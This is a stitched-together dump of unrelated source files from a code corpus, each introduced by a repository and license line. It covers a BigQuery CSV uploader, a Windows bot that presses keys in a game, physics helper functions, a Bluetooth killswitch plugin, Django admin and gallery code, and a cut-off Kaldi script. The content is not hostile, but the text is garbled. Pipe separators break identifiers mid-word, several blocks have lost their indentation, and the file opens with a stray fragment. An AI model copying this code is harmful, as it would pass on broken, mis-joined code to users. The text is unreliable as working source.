'nodegroup': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['maasserver.NodeGroup']", 'null': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
|
bazelbuild/bazel-bench | utils/bigquery_upload.py | Python | apache-2.0 | 2,925 | 0.009573 | # Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handles the uploading of result CSV to BigQuery."""
import re
import sys
import utils.logger as logger
from absl import app
from absl import flags
from google.cloud import bigquery
def upload_to_bigquery(csv_file_path, project_id, dataset_id, table_id,
                       location):
  """Uploads the csv file to BigQuery.

  Takes the configuration from GOOGLE_APPLICATION_CREDENTIALS.

  Args:
    csv_file_path: the path to the csv to be uploaded.
    project_id: the BigQuery project id.
    dataset_id: the BigQuery dataset id.
    table_id: the BigQuery table id.
    location: the BigQuery table's location.
  """
  logger.log('Uploading the data to bigquery.')
  client = bigquery.Client(project=project_id)
  dataset_ref = client.dataset(dataset_id)
  table_ref = dataset_ref.table(table_id)

  job_config = bigquery.LoadJobConfig()
  job_config.source_format = bigquery.SourceFormat.CSV
  job_config.skip_leading_rows = 1
  job_config.autodetect = False
  # Load the existing table first so the CSV is parsed against its schema
  # instead of relying on autodetection.
  table = client.get_table(table_ref)
  job_config.schema = table.schema

  with open(str(csv_file_path), 'rb') as source_file:
    job = client.load_table_from_file(
        source_file, table_ref, location=location, job_config=job_config)

  try:
    job.result()  # Waits for table load to complete.
  except Exception:
    print('Uploading failed with: %s' % str(job.errors))
    sys.exit(-1)
  logger.log('Uploaded {} rows into {}:{}.'.format(job.output_rows, dataset_id,
                                                   table_id))
FLAGS = flags.FLAGS
flags.DEFINE_string('upload_to_bigquery', None,
'The details of the BigQuery table to upload ' \
'results to: <project_id>:<dataset_id>:<table_id>:<location>')
def main(argv):
  """Validates --upload_to_bigquery and uploads each CSV named on argv.

  Args:
    argv: command-line arguments; argv[0] is the program name, the rest are
      paths of CSV files to upload.

  Raises:
    ValueError: if --upload_to_bigquery is missing or malformed.
  """
  # flags.DEFINE_string defaults to None; fail with a clear message instead
  # of the TypeError that re.match(pattern, None) would raise.
  if not FLAGS.upload_to_bigquery or not re.match(
      r'^[\w-]+:[\w-]+:[\w-]+:[\w-]+$', FLAGS.upload_to_bigquery):
    raise ValueError('--upload_to_bigquery should follow the pattern '
                     '<project_id>:<dataset_id>:<table_id>:<location>.')

  # Discard the first argument (the program name).
  csv_files_to_upload = argv[1:]
  project_id, dataset_id, table_id, location = FLAGS.upload_to_bigquery.split(
      ':')
  for filename in csv_files_to_upload:
    upload_to_bigquery(filename, project_id, dataset_id, table_id, location)
if __name__ == '__main__':
app.run(main)
|
doofmars/systems_nominal_bot | code.py | Python | mit | 6,584 | 0.092193 | import ImageGrab
import os
import time
import win32api, win32con
import quickGrab
import ImageOps
from numpy import *
"""
All coordinates assume a screen resolution of 1920x1080
And window size of 1280x720
"""
## Globals
#Top left corner of game window
pad_x = 320
pad_y = 171
#Size of window
window_x = 1280
window_y = 720
debug = False #additional debug output
prove = False #Save screenshot of button to proove key for debugging
gameover = False
folder = str(int(time.time()))
#Giant dictonary to hold key name and VK value (from gist https://gist.github.com/chriskiehl/2906125)
VK_CODE = {'backspace':0x08,
'tab':0x09,
'clear':0x0C,
'enter':0x0D,
'shift':0x10,
'ctrl':0x11,
'alt':0x12,
'pause':0x13,
'caps_lock':0x14,
'esc':0x1B,
'spacebar':0x20,
'page_up':0x21,
'page_down':0x22,
'end':0x23,
'home':0x24,
'left_arrow':0x25,
'up_arrow':0x26,
'right_arrow':0x27,
'down_arrow':0x28,
'select':0x29,
'print':0x2A,
'execute':0x2B,
'print_screen':0x2C,
'ins':0x2D,
'del':0x2E,
'help':0x2F,
'0':0x30,
'1':0x31,
'2':0x32,
'3':0x33,
'4':0x34,
'5':0x35,
'6':0x36,
'7':0x37,
'8':0x38,
'9':0x39,
'a':0x41,
'b':0x42,
'c':0x43,
'd':0x44,
'e':0x45,
'f':0x46,
'g':0x47,
'h':0x48,
'i':0x49,
'j':0x4A,
'k':0x4B,
'l':0x4C,
'm':0x4D,
'n':0x4E,
'o':0x4F,
'p':0x50,
'q':0x51,
'r':0x52,
's':0x53,
't':0x54,
'u':0x55,
'v':0x56,
'w':0x57,
'x':0x58,
'y':0x59,
'z':0x5A,
'numpad_0':0x60,
'numpad_1':0x61,
'numpad_2':0x62,
'numpad_3':0x63,
'numpad_4':0x64,
'numpad_5':0x65,
'numpad_6':0x66,
'numpad_7':0x67,
'numpad_8':0x68,
'numpad_9':0x69,
'multiply_key':0x6A,
'add_key':0x6B,
'separator_key':0x6C,
'subtract_key':0x6D,
'decimal_key':0x6E,
'divide_key':0x6F,
'F1':0x70,
'F2':0x71,
'F3':0x72,
'F4':0x73,
'F5':0x74,
'F6':0x75,
'F7':0x76,
'F8':0x77,
'F9':0x78,
'F10':0x79,
'F11':0x7A,
'F12':0x7B,
'F13':0x7C,
'F14':0x7D,
'F15':0x7E,
'F16':0x7F,
'F17':0x80,
'F18':0x81,
'F19':0x82,
'F20':0x83,
'F21':0x84,
'F22':0x85,
'F23':0x86,
'F24':0x87,
'num_lock':0x90,
'scroll_lock':0x91,
'left_shift':0xA0,
'right_shift ':0xA1,
'left_control':0xA2,
'right_control':0xA3,
'left_menu':0xA4,
'right_menu':0xA5,
'browser_back':0xA6,
'browser_forward':0xA7,
'browser_refresh':0xA8,
'browser_stop':0xA9,
'browser_ | search | ':0xAA,
'browser_favorites':0xAB,
'browser_start_and_home':0xAC,
'volume_mute':0xAD,
'volume_Down':0xAE,
'volume_up':0xAF,
'next_track':0xB0,
'previous_track':0xB1,
'stop_media':0xB2,
'play/pause_media':0xB3,
'start_mail':0xB4,
'select_media':0xB5,
'start_application_1':0xB6,
'start_application_2':0xB7,
'attn_key':0xF6,
'crsel_key':0xF7,
'exsel_key':0xF8,
'play_key':0xFA,
'zoom_key':0xFB,
'clear_key':0xFE,
'+':0xBB,
',':0xBC,
'-':0xBD,
'.':0xBE,
'/':0xBF,
'`':0xC0,
';':0xBA,
'[':0xDB,
'\\':0xDC,
']':0xDD,
"'":0xDE,
'`':0xC0}
#onscreen key positions with default window size and 1920x1080 resolution
POSITIONS = {'q': (268, 450),
'w': (354, 449),
'e': (449, 451),
'r': (540, 447),
't': (628, 447),
'y': (713, 451),
'u': (803, 447),
'i': (893, 453),
'o': (990, 451),
'p': (1081, 450),
'a': (318, 532),
's': (405, 528),
'd': (493, 530),
'f': (584, 529),
'g': (670, 525),
'h': (764, 531),
'j': (861, 536),
'k': (942, 532),
'l': (1035, 524),
'z': (366, 613),
'x': (454, 609),
'c': (542, 618),
'v': (640, 615),
'b': (724, 605),
'n': (818, 614),
'm': (908, 613)}
# Perform a left click at the current cursor position.
def mouseClick():
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
    # short hold between press and release so the game registers the click
    time.sleep(.1)
    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
    print "Left Click." #completely optional. But nice for debugging purposes.
# Move the cursor to window-relative cords (x, y); the pad_x/pad_y globals
# translate them into absolute screen coordinates.
def mousePos(cord):
    win32api.SetCursorPos((pad_x + cord[0], pad_y + cord[1]))
# Debug helper: print the cursor position relative to the game window.
def get_cords():
    x,y = win32api.GetCursorPos()
    x = x - pad_x
    y = y - pad_y
    print x,y
# Press and release each named key in sequence (names index the VK_CODE map).
def pressKey(*args):
    '''
    one press, one release.
    accepts as many arguments as you want. e.g. press('left_arrow', 'a','b').
    '''
    for i in args:
        win32api.keybd_event(VK_CODE[i], 0,0,0)
        # small gap between key-down and key-up so the game sees the press
        time.sleep(.05)
        win32api.keybd_event(VK_CODE[i],0 ,win32con.KEYEVENTF_KEYUP ,0)
# Grab a screenshot of the game window (offset/size come from the globals)
# and return it as a PIL image.
def screenGrab():
    box = (pad_x, pad_y, pad_x + window_x, pad_y + window_y)
    im = ImageGrab.grab(box)
    ##im.save(os.getcwd() + '\\Snap__' + str(int(time.time())) +'.png', 'PNG')
    return im
# Initialize a new game: focus the window, skip the intro with spacebar and
# click through the first menu.
def startGame():
    #location of first menu
    mousePos((628, 146))
    mouseClick()
    time.sleep(.1)
    #Spacebar to skip intro
    time.sleep(.1)
    pressKey('spacebar')
    #location of first menu
    mousePos((628, 146))
    mouseClick()
    time.sleep(.1)
#Function to check the keys array for red keys
def checkKeys(image):
for pos in POSITIONS:
colour = image.getpixel(POSITIONS[pos])
if (colour[2] > 50):
#white do nothing if not game over
if (colour[0] == 255 & colour[1] == 255 & colour[2] == 255):
global gameover
gameover = True
return
elif (colour[0] > 250 & colour[1] < 180 ):
#red key press key
print pos + " is red"
pressKey(pos)
if debug:
mousePos(POSITIONS[pos]) #place mouse at key position for debugging
if prove:
#save make a area box containing the hit in the center
box = (POSITIONS[pos][0] - 10, POSITIONS[pos][1] - 10, POSITIONS[pos][0] + 10, POSITIONS[pos][1] + 10)
im = image.crop(box)
im.save(os.getcwd() + '\\' + folder + '\\Snap__' + pos + '_' + str(int(round(time.time() * 1000))) +'.png', 'PNG')
print "prove saved in folder"
print pos + " is " + str(colour)
else:
#green key do nothing
if debug:
print pos + " is " + str(colour)
#Main loop: optionally dump debug/prove info, start a game and keep checking
#the keys until the game-over screen is detected.
def main():
    if debug:
        # show the sampled pixel for the 'v' key to help calibrate offsets
        mousePos(POSITIONS['v'])
        print str(screenGrab().getpixel(POSITIONS['v']))
    if prove:
        # prove mode saves a snapshot of every detected hit into a fresh
        # timestamped folder; refuse to run if the folder already exists
        if not os.path.exists(os.getcwd() + '\\' + folder):
            os.makedirs(os.getcwd() + '\\' + folder)
        else:
            print "path already exists"
            return
    print "Starting new Game"
    startGame()
    print "Game Started"
    while not gameover:
        checkKeys(screenGrab())
        time.sleep(.1)
        if debug:
            print "Finished with checking Keys"
    print "Game Over"
if __name__ == '__main__':
    main()
LorenzoBi/computational_physics | assignments/1/report/code/math_functions.py | Python | mit | 3,299 | 0.001516 | '''
This is the code containing the the mathematical functions used for the
assignment
'''
import numpy as np
# cotangent: cos(x) / sin(x)
def cot(x):
    cosine = np.cos(x)
    sine = np.sin(x)
    return cosine / sine
#The rooted equation sqrt(Rsquared - x**2) used in the finite-well calculation
def rooted_equation(x, Rsquared=36):
    radicand = Rsquared - x ** 2
    return np.sqrt(radicand)
# x * tan(x): even-parity bound-state curve
def simmetric_state(x):
    return np.tan(x) * x
# - x * cot(x): odd-parity bound-state curve
def antisimmetric_state(x):
    # sin(x) == 0 would divide by zero; return the signed limit instead.
    # (Exact float equality effectively only triggers at x == 0.)
    if np.sin(x) == 0 and - x * (np.cos(x)) > 0:
        return np.inf
    elif np.sin(x) == 0 and - x * (np.cos(x)) < 0:
        return - np.inf
    return - x * (np.cos(x) / np.sin(x))
# sqrt(Rsquared - x**2) - x*tan(x); a root marks an even-parity energy level
def simmetric_constraint(x, Rsquared=36):
    circle = rooted_equation(x, Rsquared)
    state = simmetric_state(x)
    return circle - state
# sqrt(Rsquared - x**2) + x*cot(x); a root marks an odd-parity energy level
def antisimmetric_constraint(x, Rsquared=36):
    return rooted_equation(x, Rsquared) - antisimmetric_state(x)
# derivative of sqrt(Rsquared - x**2) - x*tan(x)
def d_simmetric_costraint(x, Rsquared=36):
    # Use the Rsquared parameter here; the original hard-coded 36 under the
    # square root, which silently broke any call with a different well depth.
    return - x / np.sqrt(Rsquared - x ** 2) - np.tan(x) - x / (np.cos(x) ** 2)
# derivative of sqrt(Rsquared - x**2) + x*cot(x)
def d_antisimmetric_constraint(x, Rsquared=36):
    # Use the Rsquared parameter instead of the hard-coded 36 (same fix as
    # d_simmetric_costraint above).
    return - x / np.sqrt(Rsquared - x ** 2) + cot(x) - x / (np.sin(x) ** 2)
# simm_<N> evaluates simmetric_constraint with Rsquared fixed to <N>.  The
# root finder (find_zero) only accepts single-argument callables, which is
# why these fixed-parameter wrappers exist instead of passing Rsquared in.
def simm_10(x):
    return simmetric_constraint(x, 10)
def simm_100(x):
    return simmetric_constraint(x, 100)
def simm_1000(x):
    return simmetric_constraint(x, 1000)
def simm_10000(x):
    return simmetric_constraint(x, 10000)
def simm_100000(x):
    return simmetric_constraint(x, 100000)
def simm_1000000(x):
    return simmetric_constraint(x, 1000000)
def simm_1(x):
    return simmetric_constraint(x, 1)
def simm_40(x):
    return simmetric_constraint(x, 40)
def simm_60(x):
    return simmetric_constraint(x, 60)
def simm_5(x):
    return simmetric_constraint(x, 5)
def simm_20(x):
    return simmetric_constraint(x, 20)
def simm_80(x):
    return simmetric_constraint(x, 80)
# Normalization integrands for the hydrogen-like wave functions.  radial_*
# are the radial parts and polar_* the angular parts; the n and l in each
# name are the quantum numbers of the state.
def radial_n2_l1(x):
    return (1.0 / 24.0) * x ** 4 * np.exp(-x)
def radial_n3_l1(x):
    u = (2. * x) / 3.
    return (1. / 6.) ** 3 * u ** 4 * (4 - u) ** 2 * np.exp(-u)
def radial_n3_l2(x):
    u = (2. * x) / 3.
    return (1. / (5. * 6. ** 3)) * u ** 6 * np.exp(-u)
def polar_n2o3_l1(x):
    return (3. * x ** 2) / (4. * np.pi)
def polar_n3_l2(x):
    legendre = 3 * x ** 2 - 1
    return (5. / (16. * np.pi)) * legendre ** 2
# Integrands weighted by the volume element, used in the A_33 and F
# integrals.
def radial_n2_l1_int(x):
    return x ** 2 * radial_n2_l1(x)
def radial_n3_l1_int(x):
    return x ** 2 * radial_n3_l1(x)
def radial_n3_l2_int(x):
    return x ** 2 * radial_n3_l2(x)
def polar_n3_l2_int(x):
    return 2 * np.pi * (3 * x ** 2 - 1) * polar_n3_l2(x)
def polar_n2o3_l1_int(x):
    return 2 * np.pi * (3 * x ** 2 - 1) * polar_n2o3_l1(x)
|
antoinecarme/pyaf | tests/model_control/detailed/transf_Integration/model_control_one_enabled_Integration_MovingAverage_Seasonal_WeekOfYear_AR.py | Python | bsd-3-clause | 167 | 0.047904 | import tests.mod | el_control.test_ozone_custom_models_enabled as testmod
# Build the custom Ozone model: Integration transform, MovingAverage trend,
# weekly seasonality and an AR component.
testmod.build_model(['Integration'], ['MovingAverage'], ['Seasonal_WeekOfYear'], ['AR'])
nmercier/linux-cross-gcc | linux/lib/python2.7/dist-packages/blueman/plugins/applet/KillSwitch.py | Python | bsd-3-clause | 4,342 | 0.004606 | from gi.repository import GObject
import dbus
from blueman.Functions import *
from blueman.main.SignalTracker import SignalTracker
from blueman.plugins.AppletPlugin import AppletPlugin
from blueman.main.KillSwitchNG import KillSwitchNG, RFKillType, RFKillState
# The legacy killswitch backend is optional; mark it as missing instead of
# leaving the name undefined (the code below tests "_KillSwitch is None",
# which would raise NameError if the bare "except: pass" swallowed the
# ImportError without binding the name).
try:
    import blueman.main.KillSwitch as _KillSwitch
except ImportError:
    _KillSwitch = None
class KillSwitch(AppletPlugin):
    """Applet plugin that couples the Bluetooth power state to the platform
    rfkill switch.  Has no effect with plain USB dongles."""
    __author__ = "Walmis"
    __description__ = _(
        "Toggles a platform Bluetooth killswitch when Bluetooth power state changes. Useless with USB dongles.")
    __depends__ = ["PowerManager", "StatusIcon"]
    __icon__ = "system-shutdown"
    __options__ = {
        "checked": {"type": bool, "default": False}
    }

    def on_load(self, applet):
        # Prefer the rfkill-based manager; fall back to the legacy backend
        # when the rfkill device cannot be opened.
        self.signals = SignalTracker()
        try:
            self.Manager = KillSwitchNG()
            self.signals.Handle(self.Manager, "switch-changed", self.on_switch_changed)
            dprint("Using the new killswitch system")
        except OSError as e:
            dprint("Using the old killswitch system, reason:", e)
            if _KillSwitch is None:
                raise Exception("Failed to initialize killswitch manager")
            else:
                self.Manager = _KillSwitch.Manager()
            if not self.get_option("checked"):
                GObject.timeout_add(1000, self.check)
        self.signals.Handle(self.Manager, "switch-added", self.on_switch_added)
        self.signals.Handle(self.Manager, "switch-removed", self.on_switch_removed)

    def on_switch_added(self, manager, switch):
        # A new rfkill switch appeared; we only care about Bluetooth ones.
        if switch.type == RFKillType.BLUETOOTH:
            dprint("killswitch registered", switch.idx)
            # if manager.HardBlocked:
            # self.Applet.Plugins.PowerManager.SetPowerChangeable(False)
            #
            # if not self.Manager.GetGlobalState():
            # self.Applet.Plugins.PowerManager.SetBluetoothStatus(False)
            #
            # pm_state = self.Applet.Plugins.PowerManager.GetBluetoothStatus()
            # if self.Manager.GetGlobalState() != pm_state:
            # self.Manager.SetGlobalState(pm_state)

    def on_switch_changed(self, manager, switch):
        # Propagate rfkill state changes to the power manager / status icon.
        if switch.type == RFKillType.BLUETOOTH:
            s = manager.GetGlobalState()
            dprint("Global state:", s, "\nswitch.soft:", switch.soft, "\nswitch.hard:", switch.hard)
            self.Applet.Plugins.PowerManager.UpdatePowerState()
            self.Applet.Plugins.StatusIcon.QueryVisibility()

    def on_switch_removed(self, manager, switch):
        if switch.type == RFKillType.BLUETOOTH:
            if len(manager.devices) == 0:
                self.Applet.Plugins.StatusIcon.QueryVisibility()

    def on_power_state_query(self, manager):
        # Map the killswitch state onto the PowerManager's tri-state.
        if self.Manager.HardBlocked:
            return manager.STATE_OFF_FORCED
        else:
            dprint(self.Manager.GetGlobalState())
            if self.Manager.GetGlobalState():
                return manager.STATE_ON
            else:
                return manager.STATE_OFF

    def check(self):
        # One-shot probe: if this machine exposes no Bluetooth killswitch,
        # remember that and unload the plugin.
        try:
            if len(self.Manager.devices) == 0:
                self.set_option("checked", True)
                #this machine does not support bluetooth killswitch, let's unload
                self.Applet.Plugins.SetConfig("KillSwitch", False)
        except Exception:
            # best-effort probe; ignore failures from a partially
            # initialised manager
            pass

    def on_power_state_change_requested(self, manager, state, cb):
        dprint(state)

        def reply(*_):
            cb(True)

        def error(*_):
            cb(False)

        if not self.Manager.HardBlocked:
            self.Manager.SetGlobalState(state, reply_handler=reply, error_handler=error)
        else:
            cb(True)

    def on_unload(self):
        self.signals.DisconnectAll()

    def on_query_status_icon_visibility(self):
        # 1 = SHOW, 2 = FORCE_SHOW (see StatusIcon plugin).
        if self.Manager.HardBlocked:
            return 1
        state = self.Manager.GetGlobalState()
        if state:
            if isinstance(self.Manager, KillSwitchNG) and len(self.Manager.devices) > 0 and self.Applet.Manager:
                return 2
            return 1  # StatusIcon.SHOW
        elif len(self.Manager.devices) > 0 and not state:
            #if killswitch removes the bluetooth adapter, dont hide the statusicon,
            #so that the user could turn bluetooth back on.
            return 2  # StatusIcon.FORCE_SHOW
        return 1
|
TheBlackDude/ehealth_academy | server/manage.py | Python | mit | 246 | 0 | #!/usr/bin | /env python
import os
import sys
if __name__ == "__main__":
    # Standard Django management entry point for the eHA project.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eHA.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)
|
F483/bikesurf.org | apps/gallery/control.py | Python | mit | 2,303 | 0.002605 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Fabian Barkhau <fabian.barkhau@gmail.com>
# License: MIT (see LICENSE.TXT file)
import os
from django.core.exceptions import PermissionDenied
from apps.gallery.models import Gallery
from apps.gallery.models import Picture
from apps.team.utils import assert_member
from apps.team import control as team_control
def can_edit(account, gallery):
    """Return True if *account* may modify *gallery*.

    Team galleries are editable by team members; personal galleries only by
    their creator.
    """
    return not ((gallery.team and not team_control.is_member(account, gallery.team)) or
                (not gallery.team and gallery.created_by != account))
def _assert_can_edit(account, gallery):
    # Guard helper: raise Django's PermissionDenied on unauthorized access.
    if not can_edit(account, gallery):
        raise PermissionDenied
def delete(account, gallery):
    """ Delete gallery and all pictures belonging to it. """
    _assert_can_edit(account, gallery)
    # remove() deletes the image files on disk as well as the rows
    for picture in gallery.pictures.all():
        remove(account, picture)
    gallery.delete()
def remove(account, picture):
    """ Remove picture from the gallery and delete the image file on server. """
    gallery = picture.gallery
    _assert_can_edit(account, gallery)
    # clear the primary reference first so the gallery never points at a
    # deleted picture
    if gallery.primary == picture:
        gallery.primary = None
        gallery.updated_by = account
        gallery.save()
    os.remove(picture.image.path)
    os.remove(picture.preview.path)
    os.remove(picture.thumbnail.path)
    picture.delete()
    return gallery
def setprimary(account, picture):
    """ Set picture as the galleries primary picture. """
    gallery = picture.gallery
    _assert_can_edit(account, gallery)
    gallery.primary = picture
    gallery.save()
def add(account, image, gallery):
    """ Add a picture to the gallery. """
    _assert_can_edit(account, gallery)
    # preview/thumbnail start from the same upload; presumably resized by
    # the model fields on save -- TODO confirm
    picture = Picture()
    picture.image = image
    picture.preview = image
    picture.thumbnail = image
    picture.gallery = gallery
    picture.created_by = account
    picture.updated_by = account
    picture.save()
    return picture
def create(account, image, team):
    """ Create a new gallery. """
    # team is optional; a team gallery requires membership
    if team:
        assert_member(account, team)
    # the gallery needs a primary key before pictures can reference it
    gallery = Gallery()
    gallery.created_by = account
    gallery.updated_by = account
    gallery.team = team
    gallery.save()
    picture = add(account, image, gallery)
    gallery.primary = picture
    gallery.save()
    return gallery
|
uclouvain/osis_louvain | base/signals/publisher.py | Python | agpl-3.0 | 1,579 | 0.002535 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.dispatch import Signal
# Signals emitted when score-encoding deadlines must be (re)computed.
# NOTE(review): providing_args is deprecated since Django 3.0 and removed in
# Django 4.0 -- check the project's Django version before upgrading.
compute_scores_encodings_deadlines = Signal(providing_args=["offer_year_calendar"])
compute_student_score_encoding_deadline = Signal(providing_args=["session_exam_deadline"])
compute_all_scores_encodings_deadlines = Signal(providing_args=["academic_calendar"])
|
rectory-school/rectory-apps | enrichmentmanager/admin.py | Python | mit | 4,641 | 0.011635 | from datetime import date, datetime, time, timedelta
from django.contrib import admin
from django.utils import timezone
from enrichmentmanager.models import Teacher, Student, EnrichmentOption, EnrichmentSlot, EnrichmentSignup, EmailSuppression
from simple_history.admin import SimpleHistoryAdmin
class EditableUntilListFilter(admin.SimpleListFilter):
    # Admin sidebar filter: show only slots that have no edit cutoff set.
    title = 'edit cutoff'
    parameter_name = 'editable_until'
    def lookups(self, request, model_admin):
        # (query value, human-readable label) pairs shown in the sidebar.
        return (
            ('empty', 'No edit cutoff'),
        )
    def queryset(self, request, queryset):
        # Returning None (implicitly) leaves the queryset unfiltered.
        if self.value() == 'empty':
            return queryset.filter(editable_until=None)
class SlotDateFilter(admin.SimpleListFilter):
    """Admin sidebar filter: slots before, on or after today."""
    title = 'slot date'
    parameter_name = 'slot_date'
    def lookups(self, request, model_admin):
        return (
            ('future', 'After today'),
            ('past', 'Before today'),
            ('today', 'Today'),
        )
    def queryset(self, request, queryset):
        # No selection (None) leaves the queryset unfiltered.
        if self.value() == 'future':
            return queryset.filter(date__gt=date.today())
        if self.value() == 'past':
            return queryset.filter(date__lt=date.today())
        if self.value() == 'today':
            return queryset.filter(date=date.today())
class EnrichmentOptionInline(admin.TabularInline):
    # Edit a slot's enrichment options inline on the slot page.
    model = EnrichmentOption
class EnrichmentSlotAdmin(admin.ModelAdmin):
    inlines = [EnrichmentOptionInline]
    list_display = ['date', 'editable_until']
    actions = ['allow_edit_until_1_10_0', 'allow_edit_until_1_12_0', 'allow_edit_until_1_14_0', 'allow_edit_until_1_17_0']
    list_filter = (EditableUntilListFilter, SlotDateFilter, )
    def reset_edit_time(self, queryset, days_before, time_hours_before, time_minutes_before):
        # Set each slot's edit cutoff to the given local time, days_before
        # days ahead of the slot date.
        for slot in queryset:
            editable_date = slot.date - timedelta(days=days_before)
            editable_until_notz = datetime(
                editable_date.year,
                editable_date.month,
                editable_date.day,
                time_hours_before,
                time_minutes_before,
                0)
            # NOTE(review): .localize() is a pytz API -- confirm the project
            # uses pytz-backed timezones before upgrading Django/zoneinfo.
            editable_until = timezone.get_current_timezone().localize(editable_until_notz)
            slot.editable_until = editable_until
            slot.save()
    # The allow_edit_until_<days>_<hour>_<minute> actions below are thin
    # wrappers so each preset appears as its own admin action.
    def allow_edit_until_1_10_0(self, request, queryset):
        self.reset_edit_time(queryset, 1, 10, 0)
    def allow_edit_until_1_12_0(self, request, queryset):
        self.reset_edit_time(queryset, 1, 12, 0)
    def allow_edit_until_1_14_0(self, request, queryset):
        self.reset_edit_time(queryset, 1, 14, 0)
    def allow_edit_until_1_17_0(self, request, queryset):
        self.reset_edit_time(queryset, 1, 17, 0)
    allow_edit_until_1_10_0.short_description = "Allow editing until 10 AM on the day before"
    allow_edit_until_1_12_0.short_description = "Allow editing until noon on the day before"
    allow_edit_until_1_14_0.short_description = "Allow editing until 2 PM on the day before"
    allow_edit_until_1_17_0.short_description = "Allow editing until 5 PM on the day before"
class StudentAdmin(admin.ModelAdmin):
    """Read-mostly admin for students; only the lockout flag is editable."""
    fields = ["academic_student", "advisor", "lockout", "associated_teachers"]
    readonly_fields = ("academic_student", "advisor", "associated_teachers")
    # search_fields was assigned twice with the same value; keep one copy.
    search_fields = ["academic_student__first_name", "academic_student__last_name"]
    def has_add_permission(self, *args, **kwargs):
        # Students are synced from the academic system, never added by hand.
        return False
    def has_delete_permission(self, *args, **kwargs):
        return False
class TeacherAdmin(admin.ModelAdmin):
    # Read-only view of teachers synced from the academic system.
    fields = ["academic_teacher", 'default_room', 'default_description']
    readonly_fields = ["academic_teacher", 'default_room', 'default_description']
    list_filter = ['academic_teacher__active']
    def has_add_permission(self, *args, **kwargs):
        return False
    def has_delete_permission(self, *args, **kwargs):
        return False
class EnrichmentSignupAdmin(admin.ModelAdmin):
    # Allow narrowing signups by slot or student in the changelist.
    list_filter = ['slot', 'student']
# Register the enrichment models with the default admin site.
admin.site.register(Teacher, TeacherAdmin)
admin.site.register(Student, StudentAdmin)
admin.site.register(EnrichmentSlot, EnrichmentSlotAdmin)
admin.site.register(EnrichmentSignup, EnrichmentSignupAdmin)
admin.site.register(EmailSuppression)
gabisurita/kinto-codegen-tutorial | python-client/test/test_group.py | Python | mit | 2,149 | 0.000931 | # coding: utf-8
"""
kinto
Kinto is a minimalist JSON storage service with synchronisation and sharing abilities. It is meant to be easy to use and easy to self-host. **Limitations of this OpenAPI specification:** 1. Validation on OR clauses is not supported (e.g. provide `data` or `permissions` in patch operations). 2. [Filtering](http://kinto.readthedocs.io/en/stable/api/1.x/filtering.html) is supported on any field by using `?{prefix}{field_name}={value}`. 3. [Backoff headers](http://kinto.readthedocs.io/en/stable/api/1.x/backoff.html) may occur with any response, but they are only present if the server is under in heavy load, so we cannot validate them on every request. They are listed only on the default error message. 4. [Collection schemas](http://kinto.readthedocs.io/en/stable/api/1.x/collections.html#collection-json-schema) can be provided when defining a collection, but they are not validated by this specification.
OpenAPI spec version: 1.13
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import os
import sys
import unittest
import swagger_client
from swagger_client.rest import A | piException
from swagger_client.models.group import Group
class TestGroup(unittest.TestCase):
    """ Group unit test stubs """
    def setUp(self):
        # No fixtures needed for the generated model stub.
        pass
    def tearDown(self):
        pass
    def testGroup(self):
        """
        Test Group
        """
        # Smoke test: the generated swagger model class can be instantiated.
        model = swagger_client.models.group.Group()
if __name__ == '__main | __':
unittest.main()
|
michellemorales/OpenMM | kaldi/egs/wsj/s5/steps/nnet3/components.py | Python | gpl-2.0 | 29,765 | 0.013069 | #!/usr/bin/env python
# Note: this file is part of some nnet3 config-creation tools that are now deprecated.
from __future__ import print_function
import os
import argparse
import sys
import warnings
import copy
from operator import itemgetter
def GetSumDescriptor(inputs):
    """Fold a list of descriptor strings into one nested Sum() descriptor.

    Whitespace-only entries are dropped; the surviving descriptors are
    combined pairwise (popping from the right) until a single expression
    remains.  Returns a one-element list.  The input list is consumed.
    """
    remaining = inputs
    while len(remaining) != 1:
        combined = []
        pending = []
        while remaining:
            candidate = remaining.pop()
            if candidate.strip() != '':
                pending.append(candidate)
            if len(pending) == 2:
                combined.append("Sum({0}, {1})".format(pending[0], pending[1]))
                pending = []
        if pending:
            combined.append(pending[0])
        remaining = combined
    return remaining
# adds the input nodes and returns the descriptor
def AddInputLayer(config_lines, feat_dim, splice_indexes=[0], ivector_dim=0):
    """Add the input (and optional i-vector) nodes to the config.

    Args:
        config_lines: dict with 'components' and 'component-nodes' lists,
            appended to in place.
        feat_dim: dimension of the feature input.
        splice_indexes: time offsets spliced together (0 means no offset).
            The shared default list is never mutated, so it is safe here.
        ivector_dim: if > 0, an 'ivector' input node is added as well.

    Returns:
